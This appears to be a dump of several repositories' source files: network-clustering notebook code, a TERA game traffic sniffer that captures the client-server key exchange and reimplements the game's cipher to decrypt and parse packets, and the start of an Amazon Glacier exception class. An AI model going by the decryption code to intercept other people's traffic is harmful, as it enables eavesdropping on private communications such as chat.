# Run both of the cells below, and the graph will display between them. Yes, it's awkward right now.
# <codecell>
graph_to_be_visualized = rewired_graph
import json
from networkx.readwrite import json_graph
data = json_graph.node_link_data(graph_to_be_visualized)
with open('graph.json', 'w') as f:
json.dump(data, f, indent=4)
from IPython.display import HTML
HTML(
"""<div id="d3-example"></div>
<style>
.node {stroke: #fff; stroke-width: 1.5px;}
.link {stroke: #999; stroke-opacity: .6;}
</style>"""
)
# <codecell>
from IPython.display import Javascript
Javascript(
"""
// We load the d3.js library from the Web.
require.config({paths: {d3: "http://d3js.org/d3.v3.min"}});
require(["d3"], function(d3) {
// The code in this block is executed when the
// d3.js library has been loaded.
// First, we specify the size of the canvas containing
// the visualization (size of the <div> element).
var width = 800,
height = 800;
// We create a color scale.
var color = d3.scale.category10();
// We create a force-directed dynamic graph layout.
var force = d3.layout.force()
.charge(-120)
.linkDistance(30)
.size([width, height]);
// In the <div> element, we create a <svg> graphic
// that will contain our interactive visualization.
var svg = d3.select("#d3-example").select("svg")
if (svg.empty()) {
svg = d3.select("#d3-example").append("svg")
.attr("width", width)
.attr("height", height);
}
// We load the JSON file.
d3.json("graph.json", function(error, graph) {
// In this block, the file has been loaded
// and the 'graph' object contains our graph.
// We load the nodes and links in the force-directed
// graph.
force.nodes(graph.nodes)
.links(graph.links)
.start();
// We create a <line> SVG element for each link
// in the graph.
var link = svg.selectAll(".link")
.data(graph.links)
.enter().append("line")
.attr("class", "link");
// We create a <circle> SVG element for each node
// in the graph, and we specify a few attributes.
var node = svg.selectAll(".node")
.data(graph.nodes)
.enter().append("circle")
.attr("class", "node")
.attr("r", 5) // radius
.style("fill", function(d) {
// The node color depends on the club.
return color(d.club);
})
.call(force.drag);
// The name of each node is the node number.
node.append("title")
.text(function(d) { return d.name; });
// We bind the positions of the SVG elements
// to the positions of the dynamic force-directed graph,
// at each time step.
force.on("tick", function() {
link.attr("x1", function(d) { return d.source.x; })
.attr("y1", function(d) { return d.source.y; })
.attr("x2", function(d) { return d.target.x; })
.attr("y2", function(d) { return d.target.y; });
node.attr("cx", function(d) { return d.x; })
.attr("cy", function(d) { return d.y; });
});
});
});
"""
)
# <markdowncell>
# "When we execute this cell, the HTML object created in the previous cell is updated. The graph is animated and interactive: we can click on nodes, see their labels, and move them within the canvas."
# Code from http://nbviewer.ipython.org/github/dboyliao/cookbook-code/blob/master/notebooks/chapter06_viz/04_d3.ipynb
```
#### File: network_clustering_growth/MRC_Notebook/SBM_rewiring_example.py
```python
import networkx as nx
import community
import random
from math import floor
import clusterrewire
%pylab inline
# <codecell>
def sbm(cmtysize, pin, pout):
graphs = []
for i in range(0, len(cmtysize)):
graphs.append(nx.gnp_random_graph(cmtysize[i], pin))
G=nx.disjoint_union_all(graphs)
s=[]
s.append(0)
for i in range(0, len(cmtysize)):
s.append(s[i]+cmtysize[i])
for i in range(0, len(cmtysize)):
for n in range(s[i], s[i+1]):
for m in range(s[i+1], G.number_of_nodes()):
if rand()<pout:
G.add_edge(n, m)
return G;
# <codecell>
g=sbm([20, 20, 20], .64, .5)
partition_before_rewire = community.best_partition(g)
sets_before_rewire = [[]]
for i in range(0, len(partition_before_rewire)):
s = partition_before_rewire[i]
if s>len(sets_before_rewire)-1:
sets_before_rewire.append([])
sets_before_rewire[s].append(i)
print(sets_before_rewire)
# <codecell>
imshow(nx.to_numpy_matrix(g))
title("Network before rewiring")
# <codecell>
A = nx.to_numpy_matrix(g)
A = clusterrewire.cluster_rewire_graph(A,
percent_of_edges_to_rewire=1,
verbose=False,
property_functions=None)
rewired_graph = nx.Graph(A)
# <codecell>
partition_after_rewire = community.best_partition(rewired_graph)
sets_after_rewire = [[]]
for i in range(0, len(partition_after_rewire)):
s = partition_after_rewire[i]
if s>len(sets_after_rewire)-1:
sets_after_rewire.append([])
sets_after_rewire[s].append(i)
print(sets_after_rewire)
imshow(nx.to_numpy_matrix(rewired_graph))
title("Adjacency after rewire")
```
#### File: network_clustering_growth/MRC_Notebook/Testing_Clustering_Growth_Fix_Edges.py
```python
import networkx as nx
def nt_np(G):
triangles=0 # 6 times number of triangles
contri=0 # 2 times number of connected triples
for v,d,t in nx.algorithms.cluster._triangles_and_degree_iter(G):
contri += d*(d-1)
triangles += t
if triangles==0: # we had no triangles or possible triangles
return 0.0, float(contri)
else:
return triangles/6.0, float(contri)/2.0
def find_door(g, hinges, A2):
neighbors = A2[array(hinges)]
neighbors_t_order = argsort(neighbors.flatten())
for e in arange(g.number_of_nodes()*2):
t_index = neighbors_t_order[e]
i,x = unravel_index(t_index, shape(neighbors))
hinge = hinges[i]
y = hinges[not i]
w = A2[hinge, y]
t = A2[hinge, x]
if w<=t:
break
if g.has_edge(hinge,x) and g.degree(x) > g.degree(y) and not g.edge[hinge][x]['fixed']:
return hinge, x, y
return None, None, None
def swing_door(g, hinge, x, y):
g.remove_edge(hinge, x)
g.add_edge(hinge, y, fixed=True)
return g
def one_move(g, A2):
w_order = argsort(A2.flatten())[::-1]
A = nx.adjacency_matrix(g)
edge_list = array(A).flatten()
for w_index in w_order:
if edge_list[w_index]:
continue
hinges = unravel_index(w_index, shape(A2))
hinge, x, y = find_door(g, hinges, A2)
if hinge:
g = swing_door(g, hinge, x, y)
return g, hinge, x, y
return None
# <codecell>
n_nodes = 100
p =.005
p = 1.5*log(n_nodes)/n_nodes
g = nx.erdos_renyi_graph(n=n_nodes, p=p)
#g = random_graphs.erdos_renyi_graph(n=n_nodes, p=p)
try_count = 1
max_tries = 1000
while not nx.is_connected(g):
g = nx.erdos_renyi_graph(n=n_nodes, p=p)
try_count += 1
if try_count>max_tries:
print("Can't make a connected graph. Tried %i times."%max_tries)
break
# <codecell>
nt, np = nt_np(g)
A = nx.adjacency_matrix(g)
A2 = A**2
change_percentage = 1
n_trials = floor(change_percentage*g.number_of_edges())
Cs = [nt/np]
C_locals = [nx.average_clustering(g)]
mean_k = [mean(g.degree().values())]
pl = [nx.average_shortest_path_length(g)]
initial_degrees = g.degree().values()
# <codecell>
for i,j in g.edges_iter():
g[i][j]['fixed'] = False
print("Attempting %i trials"%n_trials)
for k in arange(n_trials):
#print k
if not k%10:
print("Rewiring %i out of %i-----------------------------------"%(k,n_trials))
A2 = array(A2)
fill_diagonal(A2, 0)
outputs = one_move(g, A2)
if not outputs:
print("Couldn't make a move!")
break
else:
g, hinge, x, y = outputs
w = A2[hinge, y]
t = A2[hinge, x]
#nt = nt + w - t
#np = np + g.degree(y) - g.degree(x) + 1
nt, np = nt_np(g)
A = nx.adjacency_matrix(g)
A2 = A**2 #To be accelerated by A2(new) = A2(old) + AN + NA + N**2 where N is A(new)-A(old)
# N = zeros(shape(A))
# N[hinge,x] = N[x, hinge] = 1
# N[hinge,y] = N[y, hinge] = -1
# A2 = A2 + AN + NA + N**2
mean_k.append(mean(g.degree().values()))
Cs.append(nt/np)
pl.append(nx.average_shortest_path_length(g))
C_locals.append(nx.average_clustering(g))
#if not k%10:
#figure()
#nx.draw_spectral(g)
# <codecell>
print("Rewired %.1f percent of edges"%(100*float(k)/n_trials))
# <codecell>
end_degrees = g.degree().values()
# <codecell>
Cs = array(Cs)
C_locals = array(C_locals)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Clustering")
ylabel("Total Clustering", color='b')
twinx()
plot(arange(k+1)/k, C_locals/C_locals[0], color='r', label="Clustering Local")
ylabel("Average Local Clustering", color='r')
title("Clustering Goes Up, With Two Definitions")
xlabel("Percent of Rewirings")
# <codecell>
Cs = array(Cs)
C_locals = array(C_locals)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Total (Triangle Density)")
#ylabel("Total Clustering", color='b')
plot(arange(k+1)/k, C_locals/C_locals[0], color='r', label="Avg. Local")
#ylabel("Average Local Clustering", color='r')
ylabel("Clustering Increase From Initial")
title("Clustering Goes Up, With Two Definitions")
xlabel("Percent of Rewirings")
lg = legend(loc=4)
lg.draw_frame(False)
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Clustering_Increases.pdf")
# <codecell>
Cs = array(Cs)
pl = array(pl)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Clustering")
ylabel("Total Clustering", color='b')
xlabel("Percent of Rewirings")
ax = gca()
ax.spines['top'].set_visible(False)
ax.get_xaxis().tick_bottom()
twinx()
plot(arange(k+1)/k, pl/pl[0], color='r', label="Average Path Length")
ylabel("Average Path Length", color='r')
title("Path Length Also Increases, Though More Slowly")
ax = gca()
ax.spines['top'].set_visible(False)
ax.get_xaxis().tick_bottom()
savefig("Model-Clustering_vs_Path_Length.pdf")
# <codecell>
Gamma = Cs/Cs[0]
Lambda = pl/pl[0]
swi = Gamma/Lambda
f = figure()
ax = f.add_subplot(1,1,1)
x = arange(k+1)/k
plot(x,swi)
text(.7, .5, "Clustering / Path Length,\nCompared to Initial", transform=ax.transAxes, horizontalalignment='center')
ylabel("Small World Index")
xlabel("Percent of Rewirings")
title("Small World Index Grows with Rewiring, then Plateaus")
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Small_World_Index.pdf")
# <codecell>
hist(initial_degrees, label='Initial', normed=True)
hist(end_degrees, alpha=.8, label='After Rewiring', normed=True)
legend()
title("Degree Distribution Changes With Rewiring")
ylabel("p(Degree)")
xlabel("Degree")
lg = legend()
lg.draw_frame(False)
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Degree_Distribution.pdf")
# <codecell>
from IPython.html import widgets
from IPython.display import display
from eventful_graph import EventfulGraph, empty_eventfulgraph_hook
from widget_forcedirectedgraph import ForceDirectedGraphWidget, publish_js
publish_js()
# <codecell>
floating_container = widgets.PopupWidget(default_view_name='ModalView')
floating_container.description = "Dynamic D3 rendering of a NetworkX graph"
floating_container.button_text = "Render Window"
floating_container.set_css({
'width': '420px',
'height': '350px'}, selector='modal')
#G = EventfulGraph()
d3 = ForceDirectedGraphWidget(g)
floating_container.children = [d3]
display(floating_container)
# <codecell>
from networkx.generators import random_graphs
from networkx.generators import classic
# Add a listener to the eventful graph's construction method.
# If an eventful graph is created, build and show a widget
# for the graph.
def handle_graph(graph):
print(graph.graph._sleep)
popup = widgets.PopupWidget()
popup.description = "NetworkX Graph"
popup.button_text = "Render Window"
popup.set_css({
'width': '420px',
'height': '350px'}, selector='modal')
graph_widget = ForceDirectedGraphWidget(graph)
popup.children = [graph_widget]
display(popup)
EventfulGraph.on_constructed(handle_graph)
# Replace the empty graph of the networkx classic module with
# the eventful graph type.
random_graphs.empty_graph = empty_eventfulgraph_hook(sleep=0.2)
# <codecell>
import d3py
with d3py.NetworkXFigure(g, name="graph",width=1000, height=1000) as p:
p += d3py.ForceLayout()
p.css['.node'] = {'fill': 'blue', 'stroke': 'magenta'}
p.save_to_files()
p.show()
```
|
{
"source": "jeff-alves/Tera",
"score": 3
}
|
#### File: Tera/core/block_splitter.py
```python
from Queue import Queue
from datetime import datetime
from threading import Thread
from core.bytes import Bytes
class BlockSplitter(Thread):
def __init__(self, direction, msg_queue):
Thread.__init__(self)
self.setDaemon(True)
self.bytes = Queue()
self.enable = True
self.msg_queue = msg_queue
self.direction = direction
def run(self):
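# Each message on the wire is framed as a little-endian uint16 total length, a
# little-endian uint16 opcode, and (length - 4) payload bytes; this loop reassembles
# one block at a time and queues it together with a timestamp and the traffic direction.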
while self.enable:
block_size = self.bytes.get() | self.bytes.get() << 8
opcode = self.bytes.get() | self.bytes.get() << 8
block = Bytes()
while block.len() < block_size - 4:
block.append(self.bytes.get())
self.msg_queue.put((datetime.utcnow(), self.direction, opcode, block))
def stop(self):
self.enable = False
def add_data(self, data):
for byte in data:
self.bytes.put(byte)
```
#### File: Tera/core/connection_handler.py
```python
from Queue import Queue
from threading import Thread
from crypt.session import Session
from game.services.hot_dot_database import HotDotDatabase
from game.services.npc_database import NpcDatabase
from game.services.server_database import ServerDatabase
from game.services.skill_database import SkillDatabase
from net.ip import Ip
from net.tcp import Tcp
from ui.main_window import MainWindow
class ConnectionHandler(Thread):
def __init__(self, c_splitter, s_splitter):
Thread.__init__(self)
self.setDaemon(True)
self.queue = Queue()
self.enable = True
self.c_splitter = c_splitter
self.s_splitter = s_splitter
self.server_keys = []
self.client_keys = []
self.servers_db = ServerDatabase()
def run(self):
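# run() proceeds in three phases, all driven by raw IP packets pulled from self.queue:
# 1) wait for the 4-byte hello [1, 0, 0, 0] to learn which known server the client has
# connected to, 2) capture the two 128-byte key packets sent by each side and build the
# crypto Session from them, 3) run every following TCP payload through the session
# cipher and hand the recovered plaintext to the server/client block splitters.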
print('Waiting to initial connection to server...')
while not self.servers_db.selected:
ip = Ip(self.queue.get())
if ip.protocol != 6: continue
tcp = Tcp(ip.data)
if len(tcp.data) == 4 and tcp.data.get_array_int(1) == [1, 0, 0, 0]:
self.servers_db.selected = self.servers_db[ip.source_addr]
print('Connected to: ' + self.servers_db.selected['name'])
MainWindow().SetServerName(self.servers_db.selected['name'])
while len(self.server_keys) < 2 or len(self.client_keys) < 2:
ip = Ip(self.queue.get())
if ip.protocol != 6 or (ip.source_addr != self.servers_db.selected['ip'] and ip.destination_addr != self.servers_db.selected['ip']): continue
tcp = Tcp(ip.data)
if tcp.data.len() == 128:
if ip.source_addr == self.servers_db.selected['ip']: # received
self.server_keys.append(tcp.data)
else: # sent
self.client_keys.append(tcp.data)
self.session = Session(self.server_keys, self.client_keys)
SkillDatabase().read(self.servers_db.selected['location'])
HotDotDatabase().read(self.servers_db.selected['location'])
NpcDatabase().read(self.servers_db.selected['location'])
while self.enable:
ip = Ip(self.queue.get())
if ip.protocol != 6 or (ip.source_addr != self.servers_db.selected['ip'] and ip.destination_addr != self.servers_db.selected['ip']): continue
tcp = Tcp(ip.data)
if not tcp.data.len(): continue
if ip.source_addr == self.servers_db.selected['ip']: # received
self.session.encrypt(tcp.data)
self.s_splitter.add_data(tcp.data)
else: # sent
self.session.decrypt(tcp.data)
self.c_splitter.add_data(tcp.data)
def stop(self):
self.enable = False
```
#### File: Tera/core/messages_handler.py
```python
from Queue import Queue
from threading import Thread
from game.message.C.C_CHECK_VERSION import C_CHECK_VERSION
from game.message.opcodes_database import OpcodesDatabase
from game.tracker import Tracker
class MessagesHandler(Thread):
def __init__(self):
Thread.__init__(self)
self.setDaemon(True)
self.messages = Queue()
self.enable = True
self.opcodes_db = OpcodesDatabase()
self.tracker = Tracker()
def run(self):
while not self.opcodes_db.opcodes_v:
msg = self.messages.get()
if msg[2] == 19900:
self.opcodes_db.read(str(C_CHECK_VERSION(self.tracker, msg[0], msg[1], msg[2], msg[3]).ver[0][1]))
print('Using opcodes: ' + str(self.opcodes_db.opcodes_v))
while self.enable:
msg = self.messages.get()
cls = self.opcodes_db.get(msg[2])
if cls:
try:
cls(self.tracker, msg[0], msg[1], msg[2], msg[3])
except Exception as e:
print(e, cls, msg[3].get_array_hex(1))
def stop(self):
self.enable = False
```
#### File: Tera/crypt/cryptor.py
```python
from sha import Sha
from core.bytes import Bytes
from cryptor_key import CryptorKey
from util.util import to_bytes, to_int32
class Cryptor(object):
def __init__(self, key):
self._key = [CryptorKey(55, 31), CryptorKey(57, 50), CryptorKey(58, 39)]
self._change_len = 0
self._change_data = 0
buf = self.fill_key(key)
for i in xrange(0, 680, 20):
sha = Sha().digest(buf)
for j in xrange(0, 5):
pos = i + (j * 4)
b = to_bytes(sha[j])
buf[pos:pos + len(b)] = b
for i in xrange(0, 220, 4):
self._key[0].buffer[i / 4] = to_int32(buf, i)
for i in xrange(0, 228, 4):
self._key[1].buffer[i / 4] = to_int32(buf, 220 + i)
for i in xrange(0, 232, 4):
self._key[2].buffer[i / 4] = to_int32(buf, 448 + i)
def fill_key(self, key):
result = Bytes([0] * 680)
for i in xrange(0, 680):
result[i] = key[i % 128]
result[0] = 128
return result
def apply_cryptor(self, buf, size):
pre = size if size < self._change_len else self._change_len
if pre != 0:
for i in xrange(0, pre):
buf[i] ^= (self._change_data >> (8 * (4 - self._change_len + i))) & 0xFF
self._change_len -= pre
size -= pre
for i in xrange(pre, buf.len() - 3, 4):
result = self._key[0].key & self._key[1].key | self._key[2].key & (self._key[0].key | self._key[1].key)
for j in xrange(0, 3):
k = self._key[j]
if result == k.key:
t1 = k.buffer[k.pos1] & 0xFFFFFFFF
t2 = k.buffer[k.pos2] & 0xFFFFFFFF
t3 = t1 if t1 <= t2 else t2
k.sum = (t1 + t2) & 0xFFFFFFFF
k.key = 1 if t3 > k.sum else 0
k.pos1 = (k.pos1 + 1) % k.size
k.pos2 = (k.pos2 + 1) % k.size
buf[i] ^= k.sum & 0xFF
buf[i + 1] ^= (k.sum >> 8) & 0xFF
buf[i + 2] ^= (k.sum >> 16) & 0xFF
buf[i + 3] ^= (k.sum >> 24) & 0xFF
remain = size & 3
if remain != 0:
result = self._key[0].key & self._key[1].key | self._key[2].key & (self._key[0].key | self._key[1].key)
self._change_data = 0
for j in xrange(0, 3):
k = self._key[j]
if result == k.key:
t1 = k.buffer[k.pos1] & 0xFFFFFFFF
t2 = k.buffer[k.pos2] & 0xFFFFFFFF
t3 = t1 if t1 <= t2 else t2
k.sum = (t1 + t2) & 0xFFFFFFFF
k.key = 1 if t3 > k.sum else 0
k.pos1 = (k.pos1 + 1) % k.size
k.pos2 = (k.pos2 + 1) % k.size
self._change_data ^= (k.sum & 0xFFFFFFFF)
for j in xrange(0, remain):
buf[size + pre - remain + j] ^= (self._change_data >> (j * 8)) & 0xFF
self._change_len = 4 - remain
```
#### File: Tera/crypt/session.py
```python
from core.bytes import Bytes
from crypt.cryptor import Cryptor
from util.util import shift_key, xor_key
class Session(object):
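# Derives the two stream-cipher states from the four 128-byte values exchanged during
# the handshake: the decrypt key is server key 1 passed through shift_key, XOR-ed with
# client key 1, then XOR-ed with a shift_key-transformed client key 2; the encrypt key
# is server key 2 passed through shift_key and then once through the freshly built
# decryptor.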
def __init__(self, server_keys, client_keys):
self.client_key1 = client_keys[0]
self.client_key2 = client_keys[1]
self.server_key1 = server_keys[0]
self.server_key2 = server_keys[1]
self.tmp_key_1 = shift_key(self.server_key1, 67)
self.tmp_key_2 = xor_key(self.tmp_key_1, self.client_key1)
self.tmp_key_1 = shift_key(self.client_key2, 29, False)
self.decrypt_key = xor_key(self.tmp_key_1, self.tmp_key_2)
self.decryptor = Cryptor(self.decrypt_key)
self.tmp_key_1 = shift_key(self.server_key2, 41)
self.decryptor.apply_cryptor(self.tmp_key_1, 128)
self.encrypt_key = Bytes([0] * 128)
self.encrypt_key[0:128] = self.tmp_key_1[0:128]
self.encryptor = Cryptor(self.encrypt_key)
def encrypt(self, data):
self.encryptor.apply_cryptor(data, data.len())
def decrypt(self, data):
self.decryptor.apply_cryptor(data, data.len())
```
#### File: message/S/S_EACH_SKILL_RESULT.py
```python
from game.services.server_database import ServerDatabase
from util.enums import SkillType
from util.tipo import tipo
class S_EACH_SKILL_RESULT(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
data.skip(4)
source_id = data.read(tipo.uint64)
if ServerDatabase().selected['location'] == "KR": data.skip(8)
dic['target_id'] = data.read(tipo.uint64)
# I think it's some kind of source ID.
# When I use a skill against any monster, it's always the same value
# When I pick up a mana mote, it's a different ID
unk1 = data.read(tipo.uint32)
dic['skill_id'] = data.read(tipo.int32) & 0x3FFFFFF
# Not sure if it's an int32, int16, int64 or something else
# When using a skill with many hits, each hit seems to have a different number (ex: 0, 1, 2, or 3)
dic['hit_id'] = data.read(tipo.int32)
# Unclear what this is; it looks like it contains 3 different parts
data.skip(12) # unknown, id, time
dic['amount'] = data.read(tipo.int32)
dic['type'] = SkillType(data.read(tipo.int32))
dic['is_critical'] = (data.read(tipo.uint16) & 1) != 0
dic['knockdown'] = (data.read(tipo.byte) & 1) != 0
data.skip(4)
dic['position'] = data.read(tipo.float, 3)
dic['angle'] = data.read(tipo.angle) * 360. / 0x10000
tracker.get_entity(source_id).skill(dic)
```
#### File: message/S/S_LOGIN.py
```python
from util.enums import Race, Gender, PlayerClass, Category
from util.tipo import tipo
class S_LOGIN(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
name_offset = data.read(tipo.offset)
data.skip(8)
model = data.read(tipo.uint32)
dic['race'] = Race((model - 100) / 200 % 50)
dic['gender'] = Gender(model / 100 % 2)
dic['class'] = PlayerClass(model % 100)
id = data.read(tipo.uint64)
dic['server_id'] = data.read(tipo.uint32)
dic['player_id'] = data.read(tipo.uint32)
data.skip(name_offset - 34)
dic['name'] = data.read(tipo.string)
dic['category'] = Category.Player
tracker.player = tracker.get_entity(id)
tracker.player.login(dic)
```
#### File: message/S/S_SPAWN_NPC.py
```python
from game.services.npc_database import NpcDatabase
from game.services.server_database import ServerDatabase
from util.enums import Category
from util.tipo import tipo
class S_SPAWN_NPC(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
data.skip(6)
if ServerDatabase().selected['location'] == "KR": data.skip(4) # not sure what's there
id = data.read(tipo.uint64)
dic['target'] = data.read(tipo.uint64)
dic['pos'] = data.read(tipo.float, 3)
dic['angle'] = data.read(tipo.angle) * 360. / 0x10000
data.skip(4)
npc_id = data.read(tipo.uint32)
npc_area = data.read(tipo.uint16)
dic['category_id'] = data.read(tipo.uint32)
data.skip(31)
dic['owner_id'] = data.read(tipo.uint64)
dic['category'] = Category.NPC
dic.update(NpcDatabase().get((npc_area, npc_id), {'npc_area':npc_area, 'npc_id':npc_id}))
tracker.get_entity(id).spaw(dic)
```
#### File: message/S/S_SPAWN_USER.py
```python
from util.enums import Category, Race, Gender, PlayerClass
from util.tipo import tipo
class S_SPAWN_USER(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
data.skip(8)
name_offset = data.read(tipo.offset)
data.skip(16)
dic['server_id'] = data.read(tipo.uint32)
dic['player_id'] = data.read(tipo.uint32)
id = data.read(tipo.uint64)
dic['pos'] = data.read(tipo.float, 3)
dic['angle'] = data.read(tipo.angle) * 360. / 0x10000
data.skip(4)
model = data.read(tipo.uint32)
dic['race'] = Race((model - 100) / 200 % 50)
dic['gender'] = Gender(model / 100 % 2)
dic['class'] = PlayerClass(model % 100)
data.skip(11)
dic['dead'] = (data.read(tipo.byte) & 1) == 0
data.poss = name_offset - 4
dic['name'] = data.read(tipo.string)
dic['guild_name'] = data.read(tipo.string)
dic['category'] = Category.User
tracker.get_entity(id).spaw(dic)
```
#### File: message/S/S_USER_STATUS.py
```python
from util.tipo import tipo
class S_USER_STATUS(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
id = data.read(tipo.uint64)
dic['in_battle'] = data.read(tipo.byte)
tracker.get_entity(id).status(dic)
```
#### File: message/unused/S_ABNORMALITY_END.py
```python
from util.tipo import tipo
class S_ABNORMALITY_END(object):
def __init__(self, tracker, time, direction, opcode, data):
target = data.read(tipo.uint64)
abnormality_id = data.read(tipo.uint32)
```
#### File: message/unused/S_ACTION_STAGE.py
```python
from util.tipo import tipo
class S_ACTION_STAGE(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
effects_count = data.read(tipo.count)
effects_offset = data.read(tipo.offset)
source = data.read(tipo.uint64)
pos = data.read(tipo.float, 3)
angle = data.read(tipo.angle)*360./0x10000
model = data.read(tipo.uint32)
skill = data.read(tipo.uint32) # & 0x3FFFFFF
stage = data.read(tipo.uint32)
speed = data.read(tipo.float)
id = data.read(tipo.uint32)
unk = data.read(tipo.float)
```
#### File: message/unused/S_GET_USER_LIST.py
```python
from util.tipo import tipo
class S_GET_USER_LIST(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
count = data.read(tipo.count)
offset = data.read(tipo.offset)
player_guilds = []
for i in xrange(1, count + 1):
data.poss = offset - 4
pointer = data.read(tipo.uint16)
next_offset = data.read(tipo.uint16)
data.skip(16)
player_id = data.read(tipo.uint32)
data.skip(286)
guild_id = data.read(tipo.uint32)
offset = next_offset
player_guilds.append((player_id, guild_id))
```
#### File: message/unused/S_PRIVATE_CHAT.py
```python
from util.tipo import tipo
class S_PRIVATE_CHAT(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
data.skip(4) # offsets
Channel = data.read(tipo.uint32)
AuthorId = data.read(tipo.uint64)
AuthorName = data.read(tipo.string)
Text = data.read(tipo.string)
```
#### File: message/unused/S_RESET_CHARM_STATUS.py
```python
from util.tipo import tipo
class S_RESET_CHARM_STATUS(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
count = data.read(tipo.uint16)
offset = data.read(tipo.uint16)
target_id = data.read(tipo.uint64)
charms = []
for i in xrange(1, count + 1):
data.skip(2) # offset pointer
data.skip(2) # next member offset
charmId = data.read(tipo.uint32)
duration = data.read(tipo.uint32)
status = data.read(tipo.byte)
charms.append((status, charmId, duration))
```
#### File: game/services/icon_database.py
```python
import os
from zipfile import ZipFile
from wx.lib.embeddedimage import PyEmbeddedImage
from util.util import singleton
@singleton
class IconDatabase(dict):
def __init__(self):
dict.__init__(self)
with ZipFile('data/icons.zip') as f:
for name_f in f.namelist():
name, ext = name_f.rsplit('.', 1)
if ext == 'png':
self.add(name, PyEmbeddedImage(f.read(name_f), False))
for f in os.listdir("data/class-icons/"):
name, ext = f.rsplit('.', 1)
if ext == 'png':
with open("data/class-icons/" + f, 'rb') as file:
self.add(name, PyEmbeddedImage(file.read(), False))
for f in os.listdir("res/"):
name, ext = f.rsplit('.', 1)
if ext == 'png' or ext == 'ico':
with open("res/" + f, 'rb') as file:
self.add(name, PyEmbeddedImage(file.read(), False))
def add(self, name, img):
self[name] = img
```
#### File: Tera/game/tracker.py
```python
from game.trackers.abnormality import Abnormality
from game.trackers.entity import Entity
from game.trackers.party import Party
from util.util import singleton
@singleton
class Tracker(object):
def __init__(self):
self.entity = {} # Entities
self.player = None
self.party = Party(self)
self.abnormality = Abnormality(self)
def get_entity(self, id):
e = self.entity.get(id)
if not e:
e = Entity(self)
self.entity[id] = e
return e
```
|
{
"source": "JeffAlyanak/amazon-glacier-cmd-interface",
"score": 2
}
|
#### File: amazon-glacier-cmd-interface/glacier/glacierexception.py
```python
import traceback
import re
import sys
import logging
"""
**********
Note by wvmarle:
This file contains the complete code from chained_exception.py plus the
error handling code from GlacierWrapper.py, allowing it to be used in other
modules like glaciercorecalls as well.
**********
"""
class GlacierException(Exception):
"""
An extension of the built-in Exception class, this handles
an additional cause keyword argument, adding it as cause
attribute to the exception message.
It logs the error message (amount of information depends on the log
level) and passes it on to a higher level to handle.
Furthermore it allows for the upstream handler to call for a
complete stack trace or just a simple error and cause message.
TODO: describe usage.
"""
ERRORCODE = {'InternalError': 127, # Library internal error.
'UndefinedErrorCode': 126, # Undefined code.
'NoResults': 125, # Operation yielded no results.
'GlacierConnectionError': 1, # Can not connect to Glacier.
'SdbConnectionError': 2, # Can not connect to SimpleDB.
'CommandError': 3, # Command line is invalid.
'VaultNameError': 4, # Invalid vault name.
'DescriptionError': 5, # Invalid archive description.
'IdError': 6, # Invalid upload/archive/job ID given.
'RegionError': 7, # Invalid region given.
'FileError': 8, # Error related to reading/writing a file.
'ResumeError': 9, # Problem resuming a multipart upload.
'NotReady': 10, # Requested download is not ready yet.
'BookkeepingError': 11, # Bookkeeping not available.
'SdbCommunicationError': 12, # Problem reading/writing SimpleDB data.
'ResourceNotFoundException': 13, # Glacier can not find the requested resource.
'InvalidParameterValueException': 14, # Parameter not accepted.
'DownloadError': 15, # Downloading an archive failed.
'SNSConnectionError': 126, # Can not connect to SNS
'SNSConfigurationError': 127, # Problem with configuration file
'SNSParameterError':128, # Problem with arguments passed to SNS
}
def __init__(self, message, code=None, cause=None):
"""
Constructor. Logs the error.
:param message: the error message.
:type message: str
:param code: the error code.
:type code: str
:param cause: explanation on what caused the error.
:type cause: str
"""
self.logger = logging.getLogger(self.__class__.__name__)
self.exitcode = self.ERRORCODE[code] if code in self.ERRORCODE else 254
self.code = code
if cause:
self.logger.error('ERROR: %s'% cause)
self.cause = cause if isinstance(cause, tuple) else (cause,)
self.stack = traceback.format_stack()[:-2]
else:
self.logger.error('An error occurred, exiting.')
self.cause = ()
# Just wrap up a cause-less exception.
# Get the stack trace for this exception.
self.stack = (
traceback.format_stack()[:-2] +
traceback.format_tb(sys.exc_info()[2]))
# ^^^ let's hope the information is still there; caller must take
# care of this.
self.message = message
self.logger.info(self.fetch(message=True))
self.logger.debug(self.fetch(stack=True))
if self.exitcode == 254:
self.logger.debug('Unknown error code: %s.'% code)
# Works as a generator to help get the stack trace and the cause
# written out.
def causeTree(self, indentation=' ', alreadyMentionedTree=[], stack=False, message=False):
"""
Returns a complete stack tree, an error message, or both.
Returns a warning if neither stack or message are True.
"""
if stack:
yield "Traceback (most recent call last):\n"
ellipsed = 0
for i, line in enumerate(self.stack):
if (ellipsed is not False
and i < len(alreadyMentionedTree)
and line == alreadyMentionedTree[i]):
ellipsed += 1
else:
if ellipsed:
yield " ... (%d frame%s repeated)\n" % (
ellipsed,
"" if ellipsed == 1 else "s")
ellipsed = False # marker for "given out"
yield line
if message:
exc = self if self.message is None else self.message
for line in traceback.format_exception_only(exc.__class__, exc):
yield line
if self.cause:
yield ("Caused by: %d exception%s\n" %
